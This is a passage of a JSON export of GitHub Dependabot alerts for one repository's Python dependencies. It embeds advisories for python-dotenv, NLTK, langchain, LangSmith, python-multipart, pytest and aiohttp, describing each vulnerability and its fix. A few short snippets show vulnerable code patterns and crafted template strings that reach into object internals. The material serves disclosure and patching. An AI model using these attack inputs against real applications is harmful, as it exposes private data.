**Temp files are written in the same directory** as the target `.env` file (instead of the system temp directory), eliminating the cross-device rename condition entirely.\n4. **`os.replace()` is used instead of `shutil.move()`**, providing atomic replacement without symlink-following fallback behavior.\n\nUsers are advised to upgrade to the patched version as soon as it is available on PyPI.\n\n### Timeline\n\n| Date | Event |\n| ------------ | ---------------------------------------------------------------------------------------------------- |\n| 2026-01-09 | Initial report received from Giorgos Tsigourakos regarding a separate, unrelated issue also located in `rewrite()` |\n| 2026-01-10 | Co-maintainer acknowledged report, requested clarification |\n| 2026-01-11 | Initial report assessed as not exploitable and closed |\n| 2026-02-24 | Reporter identified new, distinct cross-device symlink attack vector with deterministic exploitation |\n| 2026-02-26 | Co-maintainer confirmed vulnerability and shared draft patch |\n| 2026-02-26 | Reporter validated fix with monkeypatched PoC, proposed CVSS |\n| 2026-03-01 | Patch merged to main |\n| 2026-03-01 | Patched version released to PyPI |\n| 2026-04-20 | Advisory published |\n\n### Patches\n\nUpgrade to v.1.2.2 or use the patch from 
https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch","severity":"medium","identifiers":[{"value":"GHSA-mf9w-mj56-hr94","type":"GHSA"},{"value":"CVE-2026-28684","type":"CVE"}],"references":[{"url":"https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28684"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch"},{"url":"https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2"},{"url":"https://github.com/advisories/GHSA-mf9w-mj56-hr94"}],"published_at":"2026-04-21T14:38:57Z","updated_at":"2026-04-21T14:38:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 1.2.2","first_patched_version":{"identifier":"1.2.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0001,"percentile":0.01226},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-61","name":"UNIX Symbolic Link (Symlink) Following"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 
1.2.2","first_patched_version":{"identifier":"1.2.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/57","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/57","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":56,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-h8wq-7xc4-p3qx","cve_id":"CVE-2026-0846","summary":"NLTK has Arbitrary File Read via Absolute Path Input in nltk.util.filestring()","description":"A vulnerability in the `filestring()` function of the `nltk.util` module in nltk version 3.9.2 allows arbitrary file read due to improper validation of input paths. The function directly opens files specified by user input without sanitization, enabling attackers to access sensitive system files by providing absolute paths or traversal paths. 
This vulnerability can be exploited locally or remotely, particularly in scenarios where the function is used in web APIs or other interfaces that accept user-supplied input.","severity":"high","identifiers":[{"value":"GHSA-h8wq-7xc4-p3qx","type":"GHSA"},{"value":"CVE-2026-0846","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0846"},{"url":"https://huntr.com/bounties/007b84f8-418e-4300-99d0-bf504c2f97eb"},{"url":"https://github.com/nltk/nltk/pull/3485"},{"url":"https://github.com/nltk/nltk/commit/b2e1164bf89277f79b65406c829b99fb20ca1974"},{"url":"https://github.com/advisories/GHSA-h8wq-7xc4-p3qx"}],"published_at":"2026-03-09T21:31:38Z","updated_at":"2026-04-18T01:14:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 3.9.3","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00084,"percentile":0.24208},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path Traversal"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 
3.9.3","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/56","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/56","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":55,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-openai"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-r7w7-9xr2-qq2r","cve_id":"CVE-2026-41488","summary":"langchain-openai: Image token counting SSRF protection can be bypassed via DNS rebinding","description":"## Summary\n\n`langchain-openai`'s `_url_to_size()` helper (used by `get_num_tokens_from_messages` for image token counting) validated URLs for SSRF protection and then fetched them in a separate network operation with independent DNS resolution. This left a TOCTOU / DNS rebinding window: an attacker-controlled hostname could resolve to a public IP during validation and then to a private/localhost IP during the actual fetch.\n\nThe practical impact is limited because the fetched response body is passed directly to Pillow's `Image.open()` to extract dimensions — the response content is never returned, logged, or otherwise exposed to the caller. An attacker cannot exfiltrate data from internal services through this path. 
A potential risk is blind probing (inferring whether an internal host/port is open based on timing or error behavior).\n\n## Affected versions\n\n- `langchain-openai` < 1.1.14\n\n## Patched versions\n\n- `langchain-openai` >= 1.1.14 (requires `langchain-core` >= 1.2.31)\n\n## Affected code\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py` — `_url_to_size()`\n\nThe vulnerable pattern was a validate-then-fetch with separate DNS resolution:\n\n```python\nvalidate_safe_url(image_source, allow_private=False, allow_http=True)\n# ... separate network operation with independent DNS resolution ...\nresponse = httpx.get(image_source, timeout=timeout)\n```\n\n## Fix\n\nThe fix replaces the validate-then-fetch pattern with an SSRF-safe httpx transport (`SSRFSafeSyncTransport` from `langchain-core`) that:\n\n- Resolves DNS once and validates all returned IPs against a policy (private ranges, cloud metadata, localhost, k8s internal DNS)\n- Pins the connection to the validated IP, eliminating the DNS rebinding window\n- Disables redirect following to prevent redirect-based SSRF bypasses\n\nThis fix was released in langchain-openai 1.1.14.","severity":"low","identifiers":[{"value":"GHSA-r7w7-9xr2-qq2r","type":"GHSA"},{"value":"CVE-2026-41488","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-r7w7-9xr2-qq2r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41488"},{"url":"https://github.com/advisories/GHSA-r7w7-9xr2-qq2r"}],"published_at":"2026-04-16T23:00:12Z","updated_at":"2026-04-27T16:33:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 
1.1.14","first_patched_version":{"identifier":"1.1.14"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00024,"percentile":0.06665},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 1.1.14","first_patched_version":{"identifier":"1.1.14"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/55","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/55","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":54,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-rr7j-v2q5-chgv","cve_id":"CVE-2026-41182","summary":"LangSmith SDK: Streaming token events bypass output redaction","description":"## Summary\n\nThe LangSmith SDK's output redaction controls (hideOutputs in JS, hide_outputs in Python) do not apply to streaming token events. When an LLM run produces streaming output, each chunk is recorded as a new_token event containing the raw token value. These events bypass the redaction pipeline entirely — prepareRunCreateOrUpdateInputs (JS) and _hide_run_outputs (Python) only process the inputs and outputs fields on a run, never the events array. 
As a result, applications relying on output redaction to prevent sensitive LLM output from being stored in LangSmith will still leak the full streamed content via run events.\n\n## Details\n\n**Both JS and Python SDKs are affected.** The same pattern exists in both:\n\n- **JS SDK**: `traceable.ts:997-1003` and `traceable.ts:1044-1050`\n- **Python SDK**: `run_helpers.py:1924` and `run_helpers.py:1996`\n\nIn both SDKs, `new_token` events with raw `kwargs.token` values are added during streaming, and the redaction pipeline (`hideOutputs` in JS, `hide_outputs` in Python) only processes `inputs`/`outputs` — never `events`.","severity":"medium","identifiers":[{"value":"GHSA-rr7j-v2q5-chgv","type":"GHSA"},{"value":"CVE-2026-41182","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-rr7j-v2q5-chgv"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41182"},{"url":"https://github.com/advisories/GHSA-rr7j-v2q5-chgv"}],"published_at":"2026-04-16T01:20:37Z","updated_at":"2026-04-24T20:52:17Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.5.18","first_patched_version":{"identifier":"0.5.19"}},{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00036,"percentile":0.10614},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},{"cwe_id":"CWE-359","name":"Exposure of Private Personal Information to an Unauthorized Actor"},{"cwe_id":"CWE-532","name":"Insertion of Sensitive Information into Log 
File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/54","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/54","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":53,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mj87-hwqh-73pj","cve_id":"CVE-2026-40347","summary":"python-multipart affected by Denial of Service via large multipart preamble or epilogue data","description":"### Summary\n\nA denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections.\n\n### Details\n\nTwo inefficient multipart parsing paths could be abused with attacker-controlled input.\n\nBefore the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary.\n\n### Impact\n\nAn attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. 
This issue degrades availability but does not typically result in a complete denial of service for the entire application.\n\n### Mitigation\n\nUpgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.","severity":"medium","identifiers":[{"value":"GHSA-mj87-hwqh-73pj","type":"GHSA"},{"value":"CVE-2026-40347","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-mj87-hwqh-73pj"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.26"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40347"},{"url":"https://github.com/advisories/GHSA-mj87-hwqh-73pj"}],"published_at":"2026-04-15T19:45:44Z","updated_at":"2026-04-24T20:51:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 0.0.26","first_patched_version":{"identifier":"0.0.26"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0002,"percentile":0.05504},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-834","name":"Excessive Iteration"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 
0.0.26","first_patched_version":{"identifier":"0.0.26"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/53","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/53","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":52,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"pytest"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6w46-j5rx-g56g","cve_id":"CVE-2025-71176","summary":"pytest has vulnerable tmpdir handling","description":"pytest through 9.0.2 on UNIX relies on directories with the `/tmp/pytest-of-{user}` name pattern, which allows local users to cause a denial of service or possibly gain privileges.","severity":"medium","identifiers":[{"value":"GHSA-6w46-j5rx-g56g","type":"GHSA"},{"value":"CVE-2025-71176","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-71176"},{"url":"https://github.com/pytest-dev/pytest/issues/13669"},{"url":"https://www.openwall.com/lists/oss-security/2026/01/21/5"},{"url":"https://github.com/pytest-dev/pytest/pull/14343"},{"url":"https://github.com/pytest-dev/pytest/commit/95d8423bd24992deea5b9df32555fa1741679e2c"},{"url":"https://github.com/pytest-dev/pytest/releases/tag/9.0.3"},{"url":"https://github.com/advisories/GHSA-6w46-j5rx-g56g"}],"published_at":"2026-01-22T06:30:29Z","updated_at":"2026-04-13T16:38:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 
9.0.3","first_patched_version":{"identifier":"9.0.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.0025},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cwes":[{"cwe_id":"CWE-379","name":"Creation of Temporary File in Directory with Insecure Permissions"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 9.0.3","first_patched_version":{"identifier":"9.0.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/52","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/52","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":51,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-926x-3r5x-gfhw","cve_id":"CVE-2026-40087","summary":"LangChain has incomplete f-string validation in prompt templates","description":"LangChain's f-string prompt-template validation was incomplete in two respects.\n\nFirst, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as `PromptTemplate`. 
In particular, `DictPromptTemplate` and `ImagePromptTemplate` could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting.\n\nExamples of the affected shape include:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n```\n\nSecond, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:\n\n```python\n\"{name:{name.__class__.__name__}}\"\n```\n\nIn this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.\n\n## Affected usage\n\nThis issue is only relevant for applications that accept untrusted template strings, rather than only untrusted template variable values.\n\nIn addition, practical impact depends on what objects are passed into template formatting:\n\n- If applications only format simple values such as strings and numbers, impact is limited and may only result in formatting errors.\n- If applications format richer Python objects, attribute access and indexing may interact with internal object state during formatting.\n\nIn many deployments, these conditions are not commonly present together. Applications that allow end users to author arbitrary templates often expose only a narrow set of simple template variables, while applications that work with richer internal Python objects often keep template structure under developer control. 
As a result, the highest-impact scenario is plausible but is not representative of all LangChain applications.\n\nApplications that use hardcoded templates or that only allow users to provide variable values are not affected by this issue.\n\n## Impact\n\nThe direct issue in `DictPromptTemplate` and `ImagePromptTemplate` allowed attribute access and indexing expressions to survive template construction and then be evaluated during formatting. When richer Python objects were passed into formatting, this could expose internal fields or nested data to prompt output, model context, or logs.\n\nThe nested format-spec issue is narrower in scope. It bypassed the intended validation rules for f-string templates, but in simple cases it results in an invalid format specifier error rather than direct disclosure. Accordingly, its practical impact is lower than that of direct top-level attribute traversal.\n\nOverall, the practical severity depends on deployment. Meaningful confidentiality impact requires attacker control over the template structure itself, and higher impact further depends on the surrounding application passing richer internal Python objects into formatting.\n\n## Fix\n\nThe fix consists of two changes.\n\nFirst, LangChain now applies f-string safety validation consistently to `DictPromptTemplate` and `ImagePromptTemplate`, so templates containing attribute access or indexing expressions are rejected during construction and deserialization.\n\nSecond, LangChain now rejects nested replacement fields inside f-string format specifiers.\n\nConcretely, LangChain validates parsed f-string fields and raises an error for:\n\n- variable names containing attribute access or indexing syntax such as `.` or `[]`\n- format specifiers containing `{` or `}`\n\nThis blocks templates such as:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n\"{name:{name.__class__.__name__}}\"\n```\n\nThe fix preserves ordinary 
f-string formatting features such as standard format specifiers and conversions, including examples like:\n\n```python\n\"{value:.2f}\"\n\"{value:>10}\"\n\"{value!r}\"\n```\n\nIn addition, the explicit template-validation path now applies the same structural f-string checks before performing placeholder validation, ensuring that the security checks and validation checks remain aligned.","severity":"medium","identifiers":[{"value":"GHSA-926x-3r5x-gfhw","type":"GHSA"},{"value":"CVE-2026-40087","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-926x-3r5x-gfhw"},{"url":"https://github.com/langchain-ai/langchain/pull/36612"},{"url":"https://github.com/langchain-ai/langchain/pull/36613"},{"url":"https://github.com/langchain-ai/langchain/commit/6bab0ba3c12328008ddca3e0d54ff5a6151cd27b"},{"url":"https://github.com/langchain-ai/langchain/commit/af2ed47c6f008cdd551f3c0d87db3774c8dfe258"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.84"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.28"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40087"},{"url":"https://github.com/advisories/GHSA-926x-3r5x-gfhw"}],"published_at":"2026-04-08T21:51:32Z","updated_at":"2026-04-10T14:41:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":"< 0.3.83","first_patched_version":{"identifier":"0.3.84"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 
1.2.28","first_patched_version":{"identifier":"1.2.28"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00055,"percentile":0.17055},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-1336","name":"Improper Neutralization of Special Elements Used in a Template Engine"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 1.2.28","first_patched_version":{"identifier":"1.2.28"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/51","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/51","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":50,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c427-h43c-vf67","cve_id":"CVE-2026-34525","summary":"AIOHTTP accepts duplicate Host headers","description":"### Summary\n\nMultiple Host headers were allowed in aiohttp.\n\n### Impact\n\nMostly this doesn't affect aiohttp security itself, but if a reverse proxy is applying security rules depending on the target Host, it is theoretically possible that the proxy and aiohttp could process different host names, possibly resulting in bypassing a security check on the proxy and getting a request processed by aiohttp in a privileged sub app when using `Application.add_domain()`.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349\nPatch: https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000","severity":"medium","identifiers":[{"value":"GHSA-c427-h43c-vf67","type":"GHSA"},{"value":"CVE-2026-34525","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34525"},{"url":"https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000"},{"url":"https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-c427-h43c-vf67"}],"published_at":"2026-04-01T21:49:45Z","updated_at":"2026-04-01T21:49:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N","score":6.3}},"epss":{"percentage":0.0013,"percentile":0.3204},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/50","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/50","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":49,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-63hf-3vf5-4wqf","cve_id":"CVE-2026-34520","summary":"AIOHTTP's C parser (llhttp) accepts null bytes and control characters in response header values - header injection/security bypass","description":"### Summary\n\nThe C parser (the default for most installs) accepted null bytes and control characters is response headers.\n\n### Impact\n\nAn attacker could send header values that are interpreted differently than expected due to the presence of control characters. 
For example, `request.url.origin()` may return a different value than the raw Host header, or what a reverse proxy interpreted it as., potentially resulting in some kind of security bypass.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4","severity":"low","identifiers":[{"value":"GHSA-63hf-3vf5-4wqf","type":"GHSA"},{"value":"CVE-2026-34520","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hf-3vf5-4wqf"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34520"},{"url":"https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-63hf-3vf5-4wqf"}],"published_at":"2026-04-01T21:49:06Z","updated_at":"2026-04-06T23:12:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00063,"percentile":0.19232},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/49","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/49","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":48,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mwh4-6h8g-pg8w","cve_id":"CVE-2026-34519","summary":"AIOHTTP has HTTP response splitting via \\r in reason phrase","description":"### Summary\n\nAn attacker who controls the `reason` parameter when creating a `Response` may be able to inject extra headers or similar exploits.\n\n### Impact\n\nIn the unlikely situation that an application allows untrusted data to be used in the response's `reason` parameter, then an attacker could manipulate the response to send something different from what the developer intended.\n\n-----\n\nPatch: 
